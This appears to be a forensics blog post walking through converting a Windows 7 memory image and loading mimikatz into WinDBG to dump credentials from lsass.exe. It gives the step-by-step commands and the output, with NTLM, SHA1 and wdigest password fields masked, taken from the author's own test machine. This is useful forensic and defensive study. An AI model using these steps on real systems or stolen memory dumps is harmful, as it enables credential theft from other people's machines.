Now this is interesting. It is possible to load a full memory dump into WinDBG, load mimikatz and dump the credentials in cleartext. For this I used the dump of the windows 7 machine from part 2.
For this:
– Download & Install WinDBG
– Download MoonSols Windows Memory Toolkit (http://www.moonsols.com/windows-memory-toolkit/)
Convert the memory image:
C:\Users\dax\Downloads\MWMT-v1.4>bin2dmp.exe ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.dmp
Note: Don’t use the volatility built-in funcion raw2dmp for this task. This did not work for me.
In WinDBG:
– For x64 dump start WinDBG (x64)
– Open the crashdump
Then:
0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
.#####. mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
.## ^ ##. “A La Vie, A L’Amour” – Windows build 7601
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
……………………………………….
Loading User Symbols
…..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
……………..
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
SessionId: 0 Cid: 01dc Peb: 7fffffd6000 ParentCid: 0188
DirBase: 137127000 ObjectTable: fffff8a001159230 HandleCount: 660.
Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
……………………………………………………….
0: kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key: {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 835674 (00000000:000cc05a)
Session : Interactive from 0
User Name : __vmware_user__
Domain : daxamd
Logon Server : DAXAMD
Logon Time : 24.01.2016 12:09:33
SID : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
msv :
[00010000] CredentialKeys
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[00000003] Primary
* Username : __vmware_user__
* Domain : daxamd
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
tspkg : KO
wdigest :
* Username : __vmware_user__
* Domain : daxamd
* Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
kerberos :
* Username : __vmware_user__
* Domain : daxamd
* Password : (null)
ssp :
masterkey :
credman :
Authentication Id : 0 ; 221616 (00000000:000361b0)
Session : Interactive from 1
User Name : dax
Domain : daxamd
Logon Server : DAXAMD
Logon Time : 24.01.2016 12:07:40
SID : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
msv :
[00000003] Primary
* Username : dax
* Domain : daxamd
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[00010000] CredentialKeys
* NTLM : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
* SHA1 : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
tspkg : KO
wdigest :
* Username : dax
* Domain : daxamd
* Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
kerberos :
* Username : dax
* Domain : daxamd
* Password : (null)
— cut —
Again, I found this one awesome.
Links:
danielsauder 
Leave a Reply